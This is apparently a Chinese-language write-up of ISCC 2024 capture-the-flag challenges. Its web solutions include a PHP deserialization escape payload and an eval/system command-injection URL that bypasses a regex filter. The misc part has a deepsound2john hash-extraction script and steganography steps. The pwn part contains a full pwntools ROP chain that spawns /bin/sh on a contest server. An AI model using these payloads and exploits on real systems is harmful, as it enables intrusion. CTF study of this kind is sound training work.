web
狂飙
打开容器发现是一个电视剧《狂飙》里边的经典片段,提示你输入经典台词。
直接找到代码界面。
代码链接为:101.200.138.180:9999/getevidence.php
<?php
include("./2024ISCC.php");
// 欢迎大家来到ISCC,本题大家将扮演《狂飙》中的警察,寻找关键证据,抓捕犯罪嫌疑人。
$code = file_get_contents(__FILE__);
highlight_string($code);class police
{
public $work;
public $awarding = "salary";public function __construct($a)
{
$this ->work = $a;
}
public function __destruct()
{
echo "我是一名人民警察,打击违法犯罪义不容辞<br>";
$this-> work = new suspect();
echo $this-> work -> evidence_video;
echo $this-> work -> evidence_fingerprint;
}
}class suspect
{
private $video;
private $fingerprint;public function __get($name)
{
if($name == "evidence_video")
{
echo "property.transactions怎么可能这么容易获得呢?<br>";
}
else
{
echo "blood.fingerprint怎么可能这么容易获得呢?<br>";
}
}public function __toString()
{
$this -> video = "property.transactions";
$this -> fingerprint = "blood.fingerprint";
return "差点就让你获得证据了<br>";
}
}class tools
{
public $object;
private $camera = 0;
private $technology = 0;public function __construct()
{
echo "使用camera和technology可以找到蛛丝马迹<br>";
}public function __invoke()
{
$this -> camera = 1;
$this -> technology = 1;
echo $this->object;
}
}function filter($name)
{
$safe = "evil";
$name = str_replace($safe, "light", $name);
return $name;
}if (isset($_GET["evidence"]))
{
$a = filter(serialize(new police($_GET["evidence"])));
echo $a;
global $tips;
if((strpos($a, $tips) !== false) && unserialize($a) -> awarding == "pennant")
{
global $flag;
echo $flag;
}
}
?>
经分析为反序列化字符串逃逸构造32个evil即可逃逸,然后根据给出的线索得到tips写入payload即可所以直接构造payload
?evidence=O:5:%22tools%22:3:{s:6:%22object%22;O:7:%22suspect%22:2:{s:14:%22suspectvideo%22;s:21:%22property.transactions%22;s:20:%22suspectfingerprint%22;s:17:%22blood.fingerprint%22;}s:13:%22toolscamera%22;i:1;s:17:%22toolstechnology%22;i:1;}evilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevil%22;s:8:%22awarding%22;s:7:%22pennant%22;}
直接拿到flag的值。
ISCC{nSpyRnAR1ps2xKwa}
最喜欢的一集
首先打开容器,提示你去welcome.php下,直接访问,发现是代码审计的题目,先看代码的意思。
先是传入ISCC参数,然后转换成小写赋值给str,用一个foreach循环遍历上边的数组,第一个绕过就是strpos函数,用来匹配前一个字符串在后一个字符串中的位置。第二个就是正则匹配。
然后用eval()函数去执行里边的字符串执行命令操作。
http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('ls /');")
用${0}截断字符串的长度直接可以绕过正则匹配。接下来直接读取即可。发现cat、tac、more、都被过滤掉了。直接用tail即可。
http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('tail /flaaaaaaaaagggggg');")
拿到flag。
ISCC{6mXz9rkC9JfMIoGh}
misc
重隐
直接下载附件发现就是一个音频和图片,图片直接拖拽到010里边发现就是好像里边有压缩包,直接进行分离发现压缩包解压,发现有密码。
接下来分析音频,直接拖拽到deepsound里边,发现需要密码。直接deepsound2john获取哈希值。网上有代码。
import logging
import os
import sys
import textwrap
def decode_data_low(buf):
return buf[::2]
def decode_data_normal(buf):
out = bytearray()
for i in range(0, len(buf), 4):
out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))
return out
def decode_data_high(buf):
out = bytearray()
for i in range(0, len(buf), 8):
out.append((buf[i] & 3) << 6 | (buf[i + 2] & 3) << 4 \
| (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))
return out
def is_magic(buf):
# This is a more efficient way of testing for the `DSCF` magic header without
# decoding the whole buffer
return (buf[0] & 15) == (68 >> 4) and (buf[2] & 15) == (68 & 15) \
and (buf[4] & 15) == (83 >> 4) and (buf[6] & 15) == (83 & 15) \
and (buf[8] & 15) == (67 >> 4) and (buf[10] & 15) == (67 & 15) \
and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)
def is_wave(buf):
return buf[0:4] == b'RIFF' and buf[8:12] == b'WAVE'
def process_deepsound_file(f):
bname = os.path.basename(f.name)
logger = logging.getLogger(bname)
# Check if it's a .wav file
buf = f.read(12)
if not is_wave(buf):
global convert_warn
logger.error('file not in .wav format')
convert_warn = True
return
f.seek(0, os.SEEK_SET)
# Scan for the marker...
hdrsz = 104
hdr = None
while True:
off = f.tell()
buf = f.read(hdrsz)
if len(buf) < hdrsz: break
if is_magic(buf):
hdr = decode_data_normal(buf)
logger.info('found DeepSound header at offset %i', off)
break
f.seek(-hdrsz + 1, os.SEEK_CUR)
if hdr is None:
logger.warn('does not appear to be a DeepSound file')
return
# Check some header fields
mode = hdr[4]
encrypted = hdr[5]
modes = {2: 'low', 4: 'normal', 8: 'high'}
if mode in modes:
logger.info('data is encoded in %s-quality mode', modes[mode])
else:
logger.error('unexpected data encoding mode %i', modes[mode])
return
if encrypted == 0:
logger.warn('file is not encrypted')
return
elif encrypted != 1:
logger.error('unexpected encryption flag %i', encrypted)
return
sha1 = hdr[6:6+20]
print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--verbose', '-v', action='store_true')
parser.add_argument('files', nargs='+', metavar='file',
type=argparse.FileType('rb', bufsize=4096))
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARN)
convert_warn = False
for f in args.files:
process_deepsound_file(f)
if convert_warn:
print(textwrap.dedent.rstrip(), file=sys.stderr)
直接放到kail里边进行。
爆破出密码为teenager
导出文件为
直接在线找文字盲水印提取工具。[文本隐水印 (guofei.site)](https://www.guofei.site/pictures_for_blog/app/text_watermark/v1.html)
base64解码得到一部分flag。74_re2l_w4t3rm4rk}。
再分析音频文件发现是手机拨号的声音。
直接在线DTMF Decoder在线解码,再对照手机上的九键找到对应的字母,拿到密码。
但是必须为大写。解压后拿到flag.txt,直接进行解码即可得到前半段flag的值。
所以flag的值为:ISCC{y0u_f1nd_t74_re2l_w4t3rm4rk}
pwn
curious
首先下载附件然后直接拖拽到IDA里边进行分析,先找到主函数,题目换了字典序列,将大小写反转,解码即可得到flag的值。
存在栈溢出,程序是静态编译。直接跑。
拿到flag的值。
ISCC{itHIyaLc8vuIrO8tHJylJlzw2oPgwxPpj2Jg}
脚本如下:
from pwn import *
from struct import pack
context.os='linux'
elf = ELF("./pwn1")
io = remote('182.92.237.102', 10031)
p = b''
p += pack('<Q', 0x000000000040f49e)
p += pack('<Q', 0x00000000004c20e0)
p += pack('<Q', 0x0000000000452af7)
p += b'/bin//sh'
p += pack('<Q', 0x0000000000483b85)
p += pack('<Q', 0x000000000040f49e)
p += pack('<Q', 0x00000000004c20e8)
p += pack('<Q', 0x0000000000446ef9)
p += pack('<Q', 0x0000000000483b85)
p += pack('<Q', 0x0000000000401912)
p += pack('<Q', 0x00000000004c20e0)
p += pack('<Q', 0x000000000040f49e)
p += pack('<Q', 0x00000000004c20e8)
p += pack('<Q', 0x000000000040181f)
p += pack('<Q', 0x00000000004c20e8)
p += pack('<Q', 0x0000000000446ef9)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004788c0)
p += pack('<Q', 0x00000000004012d3)
payload = b"a" * 0x28 + p
io.send(b'oh1yes')
io.sendline(b'1')
io.sendline(payload)
io.interactive()